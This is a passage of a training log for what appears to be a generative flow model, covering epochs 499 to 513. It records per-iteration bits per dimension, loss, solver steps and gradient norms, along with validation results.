10.00(10.00)\nIter 5464 | Time 41.1799(40.5279) | Bit/dim 1.0737(1.0754) | Xent 0.0000(0.0000) | Loss 1.0737(1.0754) | Error 0.0000(0.0000) Steps 452(447.07) | Grad Norm 0.1113(0.0887) | Total Time 10.00(10.00)\nIter 5465 | Time 40.6501(40.5315) | Bit/dim 1.0710(1.0753) | Xent 0.0000(0.0000) | Loss 1.0710(1.0753) | Error 0.0000(0.0000) Steps 446(447.03) | Grad Norm 0.1596(0.0908) | Total Time 10.00(10.00)\nIter 5466 | Time 40.7235(40.5373) | Bit/dim 1.0749(1.0753) | Xent 0.0000(0.0000) | Loss 1.0749(1.0753) | Error 0.0000(0.0000) Steps 446(447.00) | Grad Norm 0.1038(0.0912) | Total Time 10.00(10.00)\nIter 5467 | Time 39.9538(40.5198) | Bit/dim 1.0768(1.0753) | Xent 0.0000(0.0000) | Loss 1.0768(1.0753) | Error 0.0000(0.0000) Steps 446(446.97) | Grad Norm 0.0889(0.0911) | Total Time 10.00(10.00)\nIter 5468 | Time 39.8678(40.5002) | Bit/dim 1.0762(1.0753) | Xent 0.0000(0.0000) | Loss 1.0762(1.0753) | Error 0.0000(0.0000) Steps 446(446.94) | Grad Norm 0.1438(0.0927) | Total Time 10.00(10.00)\nIter 5469 | Time 39.7585(40.4780) | Bit/dim 1.0759(1.0754) | Xent 0.0000(0.0000) | Loss 1.0759(1.0754) | Error 0.0000(0.0000) Steps 446(446.92) | Grad Norm 0.1230(0.0936) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0499 | Time 14.9515, Epoch Time 309.4141(310.6079), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5470 | Time 40.2953(40.4725) | Bit/dim 1.0752(1.0753) | Xent 0.0000(0.0000) | Loss 1.0752(1.0753) | Error 0.0000(0.0000) Steps 452(447.07) | Grad Norm 0.0650(0.0927) | Total Time 10.00(10.00)\nIter 5471 | Time 39.9621(40.4572) | Bit/dim 1.0745(1.0753) | Xent 0.0000(0.0000) | Loss 1.0745(1.0753) | Error 0.0000(0.0000) Steps 446(447.04) | Grad Norm 0.0594(0.0917) | Total Time 10.00(10.00)\nIter 5472 | Time 41.8147(40.4979) | Bit/dim 1.0755(1.0753) | Xent 0.0000(0.0000) | Loss 1.0755(1.0753) | Error 0.0000(0.0000) Steps 452(447.18) | Grad Norm 0.0883(0.0916) | Total Time 10.00(10.00)\nIter 5473 | Time 41.5043(40.5281) | Bit/dim 1.0698(1.0752) | Xent 0.0000(0.0000) | Loss 1.0698(1.0752) | Error 0.0000(0.0000) Steps 446(447.15) | Grad Norm 0.1697(0.0940) | Total Time 10.00(10.00)\nIter 5474 | Time 39.1212(40.4859) | Bit/dim 1.0763(1.0752) | Xent 0.0000(0.0000) | Loss 1.0763(1.0752) | Error 0.0000(0.0000) Steps 446(447.11) | Grad Norm 0.0704(0.0933) | Total Time 10.00(10.00)\nIter 5475 | Time 41.4938(40.5161) | Bit/dim 1.0770(1.0752) | Xent 0.0000(0.0000) | Loss 1.0770(1.0752) | Error 0.0000(0.0000) Steps 446(447.08) | Grad Norm 0.0712(0.0926) | Total Time 10.00(10.00)\nIter 5476 | Time 42.0429(40.5619) | Bit/dim 1.0770(1.0753) | Xent 0.0000(0.0000) | Loss 1.0770(1.0753) | Error 0.0000(0.0000) Steps 452(447.23) | Grad Norm 0.1717(0.0950) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0500 | Time 14.9950, Epoch Time 313.8471(310.7051), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5477 | Time 41.0356(40.5761) | Bit/dim 1.0757(1.0753) | Xent 0.0000(0.0000) | Loss 1.0757(1.0753) | Error 0.0000(0.0000) Steps 446(447.19) | Grad Norm 0.0838(0.0947) | Total Time 10.00(10.00)\nIter 5478 | Time 40.6639(40.5788) | Bit/dim 1.0770(1.0754) | Xent 0.0000(0.0000) | Loss 1.0770(1.0754) | Error 0.0000(0.0000) Steps 452(447.34) | Grad Norm 0.0598(0.0936) | Total Time 10.00(10.00)\nIter 5479 | Time 40.7231(40.5831) | Bit/dim 1.0754(1.0754) | Xent 0.0000(0.0000) | Loss 1.0754(1.0754) | Error 0.0000(0.0000) Steps 446(447.30) | Grad Norm 0.0952(0.0937) | Total Time 10.00(10.00)\nIter 5480 | Time 41.4992(40.6106) | Bit/dim 1.0735(1.0753) | Xent 0.0000(0.0000) | Loss 1.0735(1.0753) | Error 0.0000(0.0000) Steps 452(447.44) | Grad Norm 0.0500(0.0923) | Total Time 10.00(10.00)\nIter 5481 | Time 39.5582(40.5790) | Bit/dim 1.0766(1.0753) | Xent 0.0000(0.0000) | Loss 1.0766(1.0753) | Error 0.0000(0.0000) Steps 446(447.39) | Grad Norm 0.1582(0.0943) | Total Time 10.00(10.00)\nIter 5482 | Time 40.9987(40.5916) | Bit/dim 1.0783(1.0754) | Xent 0.0000(0.0000) | Loss 1.0783(1.0754) | Error 0.0000(0.0000) Steps 446(447.35) | Grad Norm 0.1017(0.0945) | Total Time 10.00(10.00)\nIter 5483 | Time 40.2581(40.5816) | Bit/dim 1.0745(1.0754) | Xent 0.0000(0.0000) | Loss 1.0745(1.0754) | Error 0.0000(0.0000) Steps 446(447.31) | Grad Norm 0.0939(0.0945) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0501 | Time 14.9761, Epoch Time 312.3253(310.7537), Bit/dim 1.0700(best: 1.0700), Xent 0.0000, Loss 1.0700, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5484 | Time 40.2090(40.5704) | Bit/dim 1.0739(1.0754) | Xent 0.0000(0.0000) | Loss 1.0739(1.0754) | Error 0.0000(0.0000) Steps 452(447.45) | Grad Norm 0.0965(0.0946) | Total Time 10.00(10.00)\nIter 5485 | Time 41.9590(40.6121) | Bit/dim 1.0752(1.0754) | Xent 0.0000(0.0000) | Loss 1.0752(1.0754) | Error 0.0000(0.0000) Steps 446(447.41) | Grad Norm 0.0756(0.0940) | Total Time 10.00(10.00)\nIter 5486 | Time 41.5597(40.6405) | Bit/dim 1.0772(1.0754) | Xent 0.0000(0.0000) | Loss 1.0772(1.0754) | Error 0.0000(0.0000) Steps 452(447.55) | Grad Norm 0.1215(0.0948) | Total Time 10.00(10.00)\nIter 5487 | Time 41.4807(40.6657) | Bit/dim 1.0723(1.0753) | Xent 0.0000(0.0000) | Loss 1.0723(1.0753) | Error 0.0000(0.0000) Steps 452(447.68) | Grad Norm 0.1016(0.0950) | Total Time 10.00(10.00)\nIter 5488 | Time 42.1533(40.7103) | Bit/dim 1.0732(1.0753) | Xent 0.0000(0.0000) | Loss 1.0732(1.0753) | Error 0.0000(0.0000) Steps 452(447.81) | Grad Norm 0.1118(0.0955) | Total Time 10.00(10.00)\nIter 5489 | Time 41.9364(40.7471) | Bit/dim 1.0737(1.0752) | Xent 0.0000(0.0000) | Loss 1.0737(1.0752) | Error 0.0000(0.0000) Steps 452(447.94) | Grad Norm 0.1675(0.0977) | Total Time 10.00(10.00)\nIter 5490 | Time 40.7514(40.7473) | Bit/dim 1.0781(1.0753) | Xent 0.0000(0.0000) | Loss 1.0781(1.0753) | Error 0.0000(0.0000) Steps 446(447.88) | Grad Norm 0.0603(0.0966) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0502 | Time 14.9519, Epoch Time 317.5604(310.9579), Bit/dim 1.0702(best: 1.0700), Xent 0.0000, Loss 1.0702, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5491 | Time 40.7168(40.7463) | Bit/dim 1.0769(1.0753) | Xent 0.0000(0.0000) | Loss 1.0769(1.0753) | Error 0.0000(0.0000) Steps 452(448.00) | Grad Norm 0.1280(0.0975) | Total Time 10.00(10.00)\nIter 5492 | Time 40.1586(40.7287) | Bit/dim 1.0723(1.0753) | Xent 0.0000(0.0000) | Loss 1.0723(1.0753) | Error 0.0000(0.0000) Steps 452(448.12) | Grad Norm 0.1400(0.0988) | Total Time 10.00(10.00)\nIter 5493 | Time 39.4911(40.6916) | Bit/dim 1.0688(1.0751) | Xent 0.0000(0.0000) | Loss 1.0688(1.0751) | Error 0.0000(0.0000) Steps 452(448.24) | Grad Norm 0.0836(0.0983) | Total Time 10.00(10.00)\nIter 5494 | Time 40.6710(40.6910) | Bit/dim 1.0730(1.0750) | Xent 0.0000(0.0000) | Loss 1.0730(1.0750) | Error 0.0000(0.0000) Steps 452(448.35) | Grad Norm 0.0648(0.0973) | Total Time 10.00(10.00)\nIter 5495 | Time 40.7529(40.6928) | Bit/dim 1.0741(1.0750) | Xent 0.0000(0.0000) | Loss 1.0741(1.0750) | Error 0.0000(0.0000) Steps 446(448.28) | Grad Norm 0.1246(0.0982) | Total Time 10.00(10.00)\nIter 5496 | Time 40.4093(40.6843) | Bit/dim 1.0788(1.0751) | Xent 0.0000(0.0000) | Loss 1.0788(1.0751) | Error 0.0000(0.0000) Steps 446(448.21) | Grad Norm 0.1253(0.0990) | Total Time 10.00(10.00)\nIter 5497 | Time 39.4105(40.6461) | Bit/dim 1.0777(1.0752) | Xent 0.0000(0.0000) | Loss 1.0777(1.0752) | Error 0.0000(0.0000) Steps 446(448.15) | Grad Norm 0.0940(0.0988) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0503 | Time 15.0404, Epoch Time 309.1715(310.9043), Bit/dim 1.0699(best: 1.0700), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5498 | Time 39.4961(40.6116) | Bit/dim 1.0756(1.0752) | Xent 0.0000(0.0000) | Loss 1.0756(1.0752) | Error 0.0000(0.0000) Steps 446(448.08) | Grad Norm 0.0645(0.0978) | Total Time 10.00(10.00)\nIter 5499 | Time 40.5833(40.6107) | Bit/dim 1.0755(1.0752) | Xent 0.0000(0.0000) | Loss 1.0755(1.0752) | Error 0.0000(0.0000) Steps 452(448.20) | Grad Norm 0.0921(0.0976) | Total Time 10.00(10.00)\nIter 5500 | Time 39.7970(40.5863) | Bit/dim 1.0722(1.0751) | Xent 0.0000(0.0000) | Loss 1.0722(1.0751) | Error 0.0000(0.0000) Steps 446(448.13) | Grad Norm 0.0770(0.0970) | Total Time 10.00(10.00)\nIter 5501 | Time 39.1042(40.5419) | Bit/dim 1.0745(1.0751) | Xent 0.0000(0.0000) | Loss 1.0745(1.0751) | Error 0.0000(0.0000) Steps 452(448.25) | Grad Norm 0.0701(0.0962) | Total Time 10.00(10.00)\nIter 5502 | Time 40.9327(40.5536) | Bit/dim 1.0722(1.0750) | Xent 0.0000(0.0000) | Loss 1.0722(1.0750) | Error 0.0000(0.0000) Steps 446(448.18) | Grad Norm 0.0738(0.0955) | Total Time 10.00(10.00)\nIter 5503 | Time 39.7365(40.5291) | Bit/dim 1.0783(1.0751) | Xent 0.0000(0.0000) | Loss 1.0783(1.0751) | Error 0.0000(0.0000) Steps 452(448.30) | Grad Norm 0.0596(0.0944) | Total Time 10.00(10.00)\nIter 5504 | Time 39.0462(40.4846) | Bit/dim 1.0770(1.0751) | Xent 0.0000(0.0000) | Loss 1.0770(1.0751) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0584(0.0934) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0504 | Time 14.9159, Epoch Time 306.1499(310.7617), Bit/dim 1.0701(best: 1.0699), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5505 | Time 41.7775(40.5234) | Bit/dim 1.0744(1.0751) | Xent 0.0000(0.0000) | Loss 1.0744(1.0751) | Error 0.0000(0.0000) Steps 452(448.34) | Grad Norm 0.0959(0.0934) | Total Time 10.00(10.00)\nIter 5506 | Time 39.1479(40.4821) | Bit/dim 1.0749(1.0751) | Xent 0.0000(0.0000) | Loss 1.0749(1.0751) | Error 0.0000(0.0000) Steps 452(448.45) | Grad Norm 0.0639(0.0926) | Total Time 10.00(10.00)\nIter 5507 | Time 39.2283(40.4445) | Bit/dim 1.0755(1.0751) | Xent 0.0000(0.0000) | Loss 1.0755(1.0751) | Error 0.0000(0.0000) Steps 452(448.56) | Grad Norm 0.0497(0.0913) | Total Time 10.00(10.00)\nIter 5508 | Time 39.1781(40.4065) | Bit/dim 1.0763(1.0752) | Xent 0.0000(0.0000) | Loss 1.0763(1.0752) | Error 0.0000(0.0000) Steps 446(448.48) | Grad Norm 0.1158(0.0920) | Total Time 10.00(10.00)\nIter 5509 | Time 42.1467(40.4587) | Bit/dim 1.0770(1.0752) | Xent 0.0000(0.0000) | Loss 1.0770(1.0752) | Error 0.0000(0.0000) Steps 446(448.41) | Grad Norm 0.1091(0.0925) | Total Time 10.00(10.00)\nIter 5510 | Time 41.6093(40.4932) | Bit/dim 1.0732(1.0752) | Xent 0.0000(0.0000) | Loss 1.0732(1.0752) | Error 0.0000(0.0000) Steps 446(448.33) | Grad Norm 0.0626(0.0916) | Total Time 10.00(10.00)\nIter 5511 | Time 39.3105(40.4578) | Bit/dim 1.0758(1.0752) | Xent 0.0000(0.0000) | Loss 1.0758(1.0752) | Error 0.0000(0.0000) Steps 446(448.26) | Grad Norm 0.0570(0.0906) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0505 | Time 15.0270, Epoch Time 309.9020(310.7359), Bit/dim 1.0699(best: 1.0699), Xent 0.0000, Loss 1.0699, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5512 | Time 41.4868(40.4886) | Bit/dim 1.0774(1.0752) | Xent 0.0000(0.0000) | Loss 1.0774(1.0752) | Error 0.0000(0.0000) Steps 446(448.20) | Grad Norm 0.0605(0.0897) | Total Time 10.00(10.00)\nIter 5513 | Time 41.6568(40.5237) | Bit/dim 1.0734(1.0752) | Xent 0.0000(0.0000) | Loss 1.0734(1.0752) | Error 0.0000(0.0000) Steps 452(448.31) | Grad Norm 0.0830(0.0895) | Total Time 10.00(10.00)\nIter 5514 | Time 42.3334(40.5780) | Bit/dim 1.0773(1.0753) | Xent 0.0000(0.0000) | Loss 1.0773(1.0753) | Error 0.0000(0.0000) Steps 446(448.24) | Grad Norm 0.0586(0.0886) | Total Time 10.00(10.00)\nIter 5515 | Time 39.2253(40.5374) | Bit/dim 1.0730(1.0752) | Xent 0.0000(0.0000) | Loss 1.0730(1.0752) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.1075(0.0891) | Total Time 10.00(10.00)\nIter 5516 | Time 41.7052(40.5724) | Bit/dim 1.0693(1.0750) | Xent 0.0000(0.0000) | Loss 1.0693(1.0750) | Error 0.0000(0.0000) Steps 446(448.11) | Grad Norm 0.0728(0.0886) | Total Time 10.00(10.00)\nIter 5517 | Time 39.9934(40.5550) | Bit/dim 1.0778(1.0751) | Xent 0.0000(0.0000) | Loss 1.0778(1.0751) | Error 0.0000(0.0000) Steps 446(448.04) | Grad Norm 0.1238(0.0897) | Total Time 10.00(10.00)\nIter 5518 | Time 41.9509(40.5969) | Bit/dim 1.0761(1.0751) | Xent 0.0000(0.0000) | Loss 1.0761(1.0751) | Error 0.0000(0.0000) Steps 446(447.98) | Grad Norm 0.0614(0.0888) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0506 | Time 15.2103, Epoch Time 316.1837(310.8993), Bit/dim 1.0697(best: 1.0699), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5519 | Time 42.5451(40.6554) | Bit/dim 1.0749(1.0751) | Xent 0.0000(0.0000) | Loss 1.0749(1.0751) | Error 0.0000(0.0000) Steps 446(447.92) | Grad Norm 0.0988(0.0891) | Total Time 10.00(10.00)\nIter 5520 | Time 39.6923(40.6265) | Bit/dim 1.0764(1.0752) | Xent 0.0000(0.0000) | Loss 1.0764(1.0752) | Error 0.0000(0.0000) Steps 446(447.87) | Grad Norm 0.2249(0.0932) | Total Time 10.00(10.00)\nIter 5521 | Time 41.1626(40.6426) | Bit/dim 1.0769(1.0752) | Xent 0.0000(0.0000) | Loss 1.0769(1.0752) | Error 0.0000(0.0000) Steps 446(447.81) | Grad Norm 0.0812(0.0928) | Total Time 10.00(10.00)\nIter 5522 | Time 41.1344(40.6573) | Bit/dim 1.0730(1.0751) | Xent 0.0000(0.0000) | Loss 1.0730(1.0751) | Error 0.0000(0.0000) Steps 446(447.76) | Grad Norm 0.0969(0.0930) | Total Time 10.00(10.00)\nIter 5523 | Time 41.4522(40.6812) | Bit/dim 1.0724(1.0751) | Xent 0.0000(0.0000) | Loss 1.0724(1.0751) | Error 0.0000(0.0000) Steps 452(447.88) | Grad Norm 0.2470(0.0976) | Total Time 10.00(10.00)\nIter 5524 | Time 41.5070(40.7059) | Bit/dim 1.0730(1.0750) | Xent 0.0000(0.0000) | Loss 1.0730(1.0750) | Error 0.0000(0.0000) Steps 452(448.01) | Grad Norm 0.1156(0.0981) | Total Time 10.00(10.00)\nIter 5525 | Time 40.7907(40.7085) | Bit/dim 1.0749(1.0750) | Xent 0.0000(0.0000) | Loss 1.0749(1.0750) | Error 0.0000(0.0000) Steps 452(448.13) | Grad Norm 0.0704(0.0973) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0507 | Time 14.9319, Epoch Time 315.6765(311.0427), Bit/dim 1.0701(best: 1.0697), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5526 | Time 39.5330(40.6732) | Bit/dim 1.0738(1.0750) | Xent 0.0000(0.0000) | Loss 1.0738(1.0750) | Error 0.0000(0.0000) Steps 446(448.06) | Grad Norm 0.1593(0.0992) | Total Time 10.00(10.00)\nIter 5527 | Time 38.7312(40.6149) | Bit/dim 1.0737(1.0749) | Xent 0.0000(0.0000) | Loss 1.0737(1.0749) | Error 0.0000(0.0000) Steps 446(448.00) | Grad Norm 0.1428(0.1005) | Total Time 10.00(10.00)\nIter 5528 | Time 41.3590(40.6373) | Bit/dim 1.0771(1.0750) | Xent 0.0000(0.0000) | Loss 1.0771(1.0750) | Error 0.0000(0.0000) Steps 446(447.94) | Grad Norm 0.0973(0.1004) | Total Time 10.00(10.00)\nIter 5529 | Time 39.9713(40.6173) | Bit/dim 1.0721(1.0749) | Xent 0.0000(0.0000) | Loss 1.0721(1.0749) | Error 0.0000(0.0000) Steps 452(448.06) | Grad Norm 0.1353(0.1014) | Total Time 10.00(10.00)\nIter 5530 | Time 39.7044(40.5899) | Bit/dim 1.0789(1.0750) | Xent 0.0000(0.0000) | Loss 1.0789(1.0750) | Error 0.0000(0.0000) Steps 452(448.18) | Grad Norm 0.1317(0.1023) | Total Time 10.00(10.00)\nIter 5531 | Time 42.0822(40.6347) | Bit/dim 1.0734(1.0750) | Xent 0.0000(0.0000) | Loss 1.0734(1.0750) | Error 0.0000(0.0000) Steps 446(448.12) | Grad Norm 0.0717(0.1014) | Total Time 10.00(10.00)\nIter 5532 | Time 41.0518(40.6472) | Bit/dim 1.0755(1.0750) | Xent 0.0000(0.0000) | Loss 1.0755(1.0750) | Error 0.0000(0.0000) Steps 446(448.05) | Grad Norm 0.0810(0.1008) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0508 | Time 15.2935, Epoch Time 310.0544(311.0130), Bit/dim 1.0701(best: 1.0697), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5533 | Time 39.3443(40.6081) | Bit/dim 1.0756(1.0750) | Xent 0.0000(0.0000) | Loss 1.0756(1.0750) | Error 0.0000(0.0000) Steps 452(448.17) | Grad Norm 0.1228(0.1015) | Total Time 10.00(10.00)\nIter 5534 | Time 38.8134(40.5543) | Bit/dim 1.0757(1.0750) | Xent 0.0000(0.0000) | Loss 1.0757(1.0750) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.1140(0.1018) | Total Time 10.00(10.00)\nIter 5535 | Time 41.9746(40.5969) | Bit/dim 1.0743(1.0750) | Xent 0.0000(0.0000) | Loss 1.0743(1.0750) | Error 0.0000(0.0000) Steps 452(448.40) | Grad Norm 0.0770(0.1011) | Total Time 10.00(10.00)\nIter 5536 | Time 40.2870(40.5876) | Bit/dim 1.0767(1.0751) | Xent 0.0000(0.0000) | Loss 1.0767(1.0751) | Error 0.0000(0.0000) Steps 446(448.32) | Grad Norm 0.0632(0.1000) | Total Time 10.00(10.00)\nIter 5537 | Time 40.6456(40.5893) | Bit/dim 1.0762(1.0751) | Xent 0.0000(0.0000) | Loss 1.0762(1.0751) | Error 0.0000(0.0000) Steps 446(448.25) | Grad Norm 0.0925(0.0997) | Total Time 10.00(10.00)\nIter 5538 | Time 41.5710(40.6188) | Bit/dim 1.0750(1.0751) | Xent 0.0000(0.0000) | Loss 1.0750(1.0751) | Error 0.0000(0.0000) Steps 452(448.37) | Grad Norm 0.1411(0.1010) | Total Time 10.00(10.00)\nIter 5539 | Time 40.4922(40.6150) | Bit/dim 1.0763(1.0751) | Xent 0.0000(0.0000) | Loss 1.0763(1.0751) | Error 0.0000(0.0000) Steps 446(448.30) | Grad Norm 0.0579(0.0997) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0509 | Time 15.4240, Epoch Time 310.9351(311.0107), Bit/dim 1.0706(best: 1.0697), Xent 0.0000, Loss 1.0706, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5540 | Time 41.6429(40.6458) | Bit/dim 1.0713(1.0750) | Xent 0.0000(0.0000) | Loss 1.0713(1.0750) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.0783(0.0990) | Total Time 10.00(10.00)\nIter 5541 | Time 40.2576(40.6342) | Bit/dim 1.0798(1.0751) | Xent 0.0000(0.0000) | Loss 1.0798(1.0751) | Error 0.0000(0.0000) Steps 446(448.16) | Grad Norm 0.1496(0.1006) | Total Time 10.00(10.00)\nIter 5542 | Time 40.7560(40.6378) | Bit/dim 1.0800(1.0753) | Xent 0.0000(0.0000) | Loss 1.0800(1.0753) | Error 0.0000(0.0000) Steps 452(448.28) | Grad Norm 0.0635(0.0994) | Total Time 10.00(10.00)\nIter 5543 | Time 40.2309(40.6256) | Bit/dim 1.0692(1.0751) | Xent 0.0000(0.0000) | Loss 1.0692(1.0751) | Error 0.0000(0.0000) Steps 452(448.39) | Grad Norm 0.0667(0.0985) | Total Time 10.00(10.00)\nIter 5544 | Time 41.2298(40.6437) | Bit/dim 1.0784(1.0752) | Xent 0.0000(0.0000) | Loss 1.0784(1.0752) | Error 0.0000(0.0000) Steps 452(448.50) | Grad Norm 0.0902(0.0982) | Total Time 10.00(10.00)\nIter 5545 | Time 42.0548(40.6861) | Bit/dim 1.0742(1.0752) | Xent 0.0000(0.0000) | Loss 1.0742(1.0752) | Error 0.0000(0.0000) Steps 452(448.60) | Grad Norm 0.0891(0.0979) | Total Time 10.00(10.00)\nIter 5546 | Time 40.8064(40.6897) | Bit/dim 1.0736(1.0751) | Xent 0.0000(0.0000) | Loss 1.0736(1.0751) | Error 0.0000(0.0000) Steps 446(448.52) | Grad Norm 0.0707(0.0971) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0510 | Time 15.1003, Epoch Time 314.5092(311.1156), Bit/dim 1.0698(best: 1.0697), Xent 0.0000, Loss 1.0698, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5547 | Time 40.3114(40.6783) | Bit/dim 1.0762(1.0752) | Xent 0.0000(0.0000) | Loss 1.0762(1.0752) | Error 0.0000(0.0000) Steps 446(448.45) | Grad Norm 0.0671(0.0962) | Total Time 10.00(10.00)\nIter 5548 | Time 39.9333(40.6560) | Bit/dim 1.0755(1.0752) | Xent 0.0000(0.0000) | Loss 1.0755(1.0752) | Error 0.0000(0.0000) Steps 446(448.37) | Grad Norm 0.0824(0.0958) | Total Time 10.00(10.00)\nIter 5549 | Time 41.9729(40.6955) | Bit/dim 1.0759(1.0752) | Xent 0.0000(0.0000) | Loss 1.0759(1.0752) | Error 0.0000(0.0000) Steps 446(448.30) | Grad Norm 0.0727(0.0951) | Total Time 10.00(10.00)\nIter 5550 | Time 40.2704(40.6827) | Bit/dim 1.0721(1.0751) | Xent 0.0000(0.0000) | Loss 1.0721(1.0751) | Error 0.0000(0.0000) Steps 446(448.23) | Grad Norm 0.1212(0.0959) | Total Time 10.00(10.00)\nIter 5551 | Time 41.3326(40.7022) | Bit/dim 1.0733(1.0750) | Xent 0.0000(0.0000) | Loss 1.0733(1.0750) | Error 0.0000(0.0000) Steps 452(448.35) | Grad Norm 0.0940(0.0958) | Total Time 10.00(10.00)\nIter 5552 | Time 40.2491(40.6886) | Bit/dim 1.0719(1.0750) | Xent 0.0000(0.0000) | Loss 1.0719(1.0750) | Error 0.0000(0.0000) Steps 446(448.28) | Grad Norm 0.0810(0.0954) | Total Time 10.00(10.00)\nIter 5553 | Time 42.9620(40.7568) | Bit/dim 1.0770(1.0750) | Xent 0.0000(0.0000) | Loss 1.0770(1.0750) | Error 0.0000(0.0000) Steps 446(448.21) | Grad Norm 0.0797(0.0949) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0511 | Time 15.1707, Epoch Time 314.8318(311.2271), Bit/dim 1.0697(best: 1.0697), Xent 0.0000, Loss 1.0697, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5554 | Time 40.7378(40.7563) | Bit/dim 1.0739(1.0750) | Xent 0.0000(0.0000) | Loss 1.0739(1.0750) | Error 0.0000(0.0000) Steps 446(448.14) | Grad Norm 0.0990(0.0950) | Total Time 10.00(10.00)\nIter 5555 | Time 40.9132(40.7610) | Bit/dim 1.0780(1.0751) | Xent 0.0000(0.0000) | Loss 1.0780(1.0751) | Error 0.0000(0.0000) Steps 446(448.08) | Grad Norm 0.0583(0.0939) | Total Time 10.00(10.00)\nIter 5556 | Time 40.7649(40.7611) | Bit/dim 1.0777(1.0752) | Xent 0.0000(0.0000) | Loss 1.0777(1.0752) | Error 0.0000(0.0000) Steps 452(448.19) | Grad Norm 0.0655(0.0931) | Total Time 10.00(10.00)\nIter 5557 | Time 40.3921(40.7500) | Bit/dim 1.0717(1.0750) | Xent 0.0000(0.0000) | Loss 1.0717(1.0750) | Error 0.0000(0.0000) Steps 452(448.31) | Grad Norm 0.0620(0.0922) | Total Time 10.00(10.00)\nIter 5558 | Time 41.9066(40.7847) | Bit/dim 1.0731(1.0750) | Xent 0.0000(0.0000) | Loss 1.0731(1.0750) | Error 0.0000(0.0000) Steps 446(448.24) | Grad Norm 0.0679(0.0914) | Total Time 10.00(10.00)\nIter 5559 | Time 40.6174(40.7797) | Bit/dim 1.0770(1.0751) | Xent 0.0000(0.0000) | Loss 1.0770(1.0751) | Error 0.0000(0.0000) Steps 446(448.17) | Grad Norm 0.0595(0.0905) | Total Time 10.00(10.00)\nIter 5560 | Time 39.2871(40.7349) | Bit/dim 1.0736(1.0750) | Xent 0.0000(0.0000) | Loss 1.0736(1.0750) | Error 0.0000(0.0000) Steps 446(448.11) | Grad Norm 0.0572(0.0895) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0512 | Time 15.0954, Epoch Time 312.4260(311.2631), Bit/dim 1.0695(best: 1.0697), Xent 0.0000, Loss 1.0695, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5561 | Time 39.6834(40.7034) | Bit/dim 1.0742(1.0750) | Xent 0.0000(0.0000) | Loss 1.0742(1.0750) | Error 0.0000(0.0000) Steps 452(448.22) | Grad Norm 0.0605(0.0886) | Total Time 10.00(10.00)\nIter 5562 | Time 39.1002(40.6553) | Bit/dim 1.0722(1.0749) | Xent 0.0000(0.0000) | Loss 1.0722(1.0749) | Error 0.0000(0.0000) Steps 446(448.16) | Grad Norm 0.0602(0.0877) | Total Time 10.00(10.00)\nIter 5563 | Time 39.5828(40.6231) | Bit/dim 1.0747(1.0749) | Xent 0.0000(0.0000) | Loss 1.0747(1.0749) | Error 0.0000(0.0000) Steps 452(448.27) | Grad Norm 0.0849(0.0877) | Total Time 10.00(10.00)\nIter 5564 | Time 39.6724(40.5946) | Bit/dim 1.0802(1.0751) | Xent 0.0000(0.0000) | Loss 1.0802(1.0751) | Error 0.0000(0.0000) Steps 446(448.20) | Grad Norm 0.0824(0.0875) | Total Time 10.00(10.00)\nIter 5565 | Time 39.5496(40.5632) | Bit/dim 1.0791(1.0752) | Xent 0.0000(0.0000) | Loss 1.0791(1.0752) | Error 0.0000(0.0000) Steps 446(448.14) | Grad Norm 0.0772(0.0872) | Total Time 10.00(10.00)\nIter 5566 | Time 41.8769(40.6026) | Bit/dim 1.0673(1.0749) | Xent 0.0000(0.0000) | Loss 1.0673(1.0749) | Error 0.0000(0.0000) Steps 446(448.07) | Grad Norm 0.0928(0.0874) | Total Time 10.00(10.00)\nIter 5567 | Time 41.4019(40.6266) | Bit/dim 1.0788(1.0751) | Xent 0.0000(0.0000) | Loss 1.0788(1.0751) | Error 0.0000(0.0000) Steps 452(448.19) | Grad Norm 0.0541(0.0864) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0513 | Time 15.1329, Epoch Time 308.3945(311.1770), Bit/dim 1.0701(best: 1.0695), Xent 0.0000, Loss 1.0701, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5568 | Time 40.9278(40.6357) | Bit/dim 1.0737(1.0750) | Xent 0.0000(0.0000) | Loss 1.0737(1.0750) | Error 0.0000(0.0000) Steps 